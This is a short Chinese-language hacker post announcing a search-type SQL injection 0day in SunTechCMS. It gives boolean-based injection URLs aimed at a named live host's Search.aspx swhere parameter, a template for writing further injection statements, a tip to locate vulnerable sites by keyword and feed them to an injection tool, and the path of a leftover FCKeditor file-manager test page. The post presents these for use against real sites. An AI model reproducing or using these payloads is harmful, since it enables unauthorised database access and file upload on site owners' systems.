标题:SunTechCMS 搜索型注入通杀0day

作者:hackdn

转载请注明

 

漏洞:

 

hellxman.blog.51cto.com/Search.aspx?swhere=1%’and%201=1%20and%20’%’=’

hellxman.blog.51cto.com/Search.aspx?swhere=1%’and%201=2%20and%20’%’=’

 自己构造语句:%’and 注入语句 and ‘%25’=’

闲累的自己找个关键字,再把地址hellxman.blog.51cto.com/Search.aspx?swhere=  扔工具里头

 

并且Fckeditor的test.html没删,/fckeditor/editor/filemanager/connectors/test.html

 

 

 

PS:最近检测网站多了,随手便找了下源码的漏洞,大多不是太主流的CMS,自己当做记录,过两天爆个Discuz的洞玩